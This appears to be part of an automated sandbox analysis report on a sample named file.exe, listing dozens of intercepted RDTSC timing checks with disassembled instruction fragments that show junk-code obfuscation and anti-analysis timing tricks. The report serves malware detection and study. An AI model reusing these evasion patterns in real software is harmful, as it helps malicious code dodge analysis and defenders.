                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796158 second address: 796162 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796C6C second address: 796C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7978A3 second address: 797925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E510h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F402CC7E508h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1B14h], edi 0x0000002c je 00007F402CC7E50Ch 0x00000032 mov esi, dword ptr [ebp+122D2C97h] 0x00000038 push 00000000h 0x0000003a pushad 0x0000003b mov bx, 694Dh 0x0000003f popad 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F402CC7E508h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 0000001Ch 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c cmc 0x0000005d mov si, 59B2h 0x00000061 xchg eax, ebx 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 jbe 00007F402CC7E506h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797925 second address: 797964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007F402CDD4F56h 0x00000010 jnl 00007F402CDD4F56h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F402CDD4F62h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A398 second address: 79A3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F402CC7E506h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A3A4 second address: 79A3A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A3A8 second address: 79A3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jo 00007F402CC7E506h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A3BA second address: 79A3CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F402CDD4F5Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A452 second address: 79A485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F402CC7E506h 0x00000010 jnl 00007F402CC7E506h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F402CC7E50Fh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B431 second address: 79B4CE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F402CDD4F58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F402CDD4F58h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 and edi, 7FF59DAFh 0x0000002d je 00007F402CDD4F5Ch 0x00000033 sub ebx, dword ptr [ebp+122D29D7h] 0x00000039 jmp 00007F402CDD4F63h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007F402CDD4F58h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000018h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a mov edi, dword ptr [ebp+122D1C19h] 0x00000060 push 00000000h 0x00000062 jmp 00007F402CDD4F63h 0x00000067 xchg eax, esi 0x00000068 pushad 0x00000069 push ecx 0x0000006a push edi 0x0000006b pop edi 0x0000006c pop ecx 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A60D second address: 79A611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B4CE second address: 79B4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79C3D5 second address: 79C45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c jno 00007F402CC7E508h 0x00000012 pop edi 0x00000013 nop 0x00000014 mov di, 1109h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F402CC7E508h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 call 00007F402CC7E50Dh 0x00000039 mov ebx, dword ptr [ebp+122D307Bh] 0x0000003f pop ebx 0x00000040 mov edi, dword ptr [ebp+122D2BB7h] 0x00000046 push 00000000h 0x00000048 jmp 00007F402CC7E512h 0x0000004d xchg eax, esi 0x0000004e push esi 0x0000004f pushad 0x00000050 jmp 00007F402CC7E50Ah 0x00000055 push ecx 0x00000056 pop ecx 0x00000057 popad 0x00000058 pop esi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jng 00007F402CC7E50Ch 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B6BD second address: 79B6C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79C45D second address: 79C461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B6C1 second address: 79B6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79C61C second address: 79C62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F402CC7E50Bh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79FA30 second address: 79FA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79FBBE second address: 79FBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1A95 second address: 7A1A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1CF4 second address: 7A1CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3C2E second address: 7A3C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3C32 second address: 7A3C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2D5D second address: 7A2D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2D63 second address: 7A2E2D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnc 00007F402CC7E50Ah 0x00000013 nop 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov bh, ch 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov eax, dword ptr [ebp+122D1029h] 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F402CC7E508h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D19E1h], ebx 0x0000004a adc di, F330h 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ebp 0x00000054 call 00007F402CC7E508h 0x00000059 pop ebp 0x0000005a mov dword ptr [esp+04h], ebp 0x0000005e add dword ptr [esp+04h], 00000018h 0x00000066 inc ebp 0x00000067 push ebp 0x00000068 ret 0x00000069 pop ebp 0x0000006a ret 0x0000006b jmp 00007F402CC7E518h 0x00000070 jno 00007F402CC7E507h 0x00000076 nop 0x00000077 jmp 00007F402CC7E517h 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jnl 00007F402CC7E515h 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5B18 second address: 7A5B1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5B1C second address: 7A5B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5B22 second address: 7A5B3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A60F0 second address: 7A60F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A60F5 second address: 7A6183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F402CDD4F56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F402CDD4F61h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F402CDD4F58h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1A1Dh], edx 0x00000034 push 00000000h 0x00000036 jmp 00007F402CDD4F5Bh 0x0000003b push 00000000h 0x0000003d call 00007F402CDD4F64h 0x00000042 pop ebx 0x00000043 or ebx, 130475F7h 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b jmp 00007F402CDD4F65h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8560 second address: 7A8565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA316 second address: 7AA358 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F402CDD4F56h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D2A97h] 0x00000015 push 00000000h 0x00000017 mov di, D822h 0x0000001b push 00000000h 0x0000001d mov bx, C0BEh 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 jmp 00007F402CDD4F67h 0x00000028 jp 00007F402CDD4F5Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA358 second address: 7AA372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F402CC7E512h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA372 second address: 7AA378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9560 second address: 7A95D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+122D3176h], eax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F402CC7E508h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D35CDh], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+124546E2h], ebx 0x00000044 mov eax, dword ptr [ebp+122D0ED9h] 0x0000004a jmp 00007F402CC7E50Fh 0x0000004f push FFFFFFFFh 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F402CC7E510h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA378 second address: 7AA37C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A95D1 second address: 7A95F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F402CC7E50Eh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB2F3 second address: 7AB37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push ebx 0x00000007 jmp 00007F402CDD4F5Bh 0x0000000c pop ebx 0x0000000d nop 0x0000000e mov dword ptr [ebp+124546E2h], esi 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 mov ebx, dword ptr [ebp+122D2C27h] 0x0000001d pop edi 0x0000001e jmp 00007F402CDD4F66h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F402CDD4F58h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov edi, ebx 0x00000041 call 00007F402CDD4F5Fh 0x00000046 pop ebx 0x00000047 xchg eax, esi 0x00000048 push edx 0x00000049 jmp 00007F402CDD4F5Fh 0x0000004e pop edx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jp 00007F402CDD4F5Ch 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB37B second address: 7AB37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA53B second address: 7AA542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA542 second address: 7AA54C instructions: 0x00000000 rdtsc 0x00000002 je 00007F402CC7E50Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA54C second address: 7AA563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F402CDD4F5Ah 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD8A0 second address: 7AD8A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B31E5 second address: 7B31F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CDD4F5Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B83F4 second address: 7B8410 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8410 second address: 7B8416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8416 second address: 7B8453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F402CC7E514h 0x00000010 jl 00007F402CC7E511h 0x00000016 jmp 00007F402CC7E50Bh 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jc 00007F402CC7E506h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8453 second address: 7B8457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8457 second address: 7B845D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B845D second address: 7B8472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F402CDD4F61h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8472 second address: 7B8488 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8597 second address: 7B85A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE9A0 second address: 7BE9A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE9A4 second address: 7BE9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE9AA second address: 7BE9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F402CC7E511h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE9C0 second address: 7BE9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F402CDD4F5Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE9D6 second address: 7BE9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007F402CC7E506h 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007F402CC7E506h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD664 second address: 7BD687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F402CDD4F56h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F402CDD4F64h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD687 second address: 7BD68D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE393 second address: 7BE39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE4E1 second address: 7BE51C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c jno 00007F402CC7E51Dh 0x00000012 jmp 00007F402CC7E50Fh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE64E second address: 7BE66B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F402CDD4F68h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE66B second address: 7BE679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE679 second address: 7BE6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CDD4F65h 0x00000009 popad 0x0000000a jno 00007F402CDD4F6Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE849 second address: 7BE84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE84D second address: 7BE855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C52CB second address: 7C52FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E512h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F402CC7E510h 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7902AD second address: 7902D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F402CDD4F58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 43DB3AB2h 0x00000011 mov dx, bx 0x00000014 push 3FC2D4B0h 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F402CDD4F56h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7902D1 second address: 7902D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7903F4 second address: 7903FE instructions: 0x00000000 rdtsc 0x00000002 je 00007F402CDD4F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7903FE second address: 79044C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jmp 00007F402CC7E50Fh 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 pop edi 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F402CC7E508h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d jg 00007F402CC7E506h 0x00000033 mov edx, eax 0x00000035 nop 0x00000036 push edi 0x00000037 je 00007F402CC7E50Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79044C second address: 79045C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jl 00007F402CDD4F6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79045C second address: 790460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7904DD second address: 7904E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
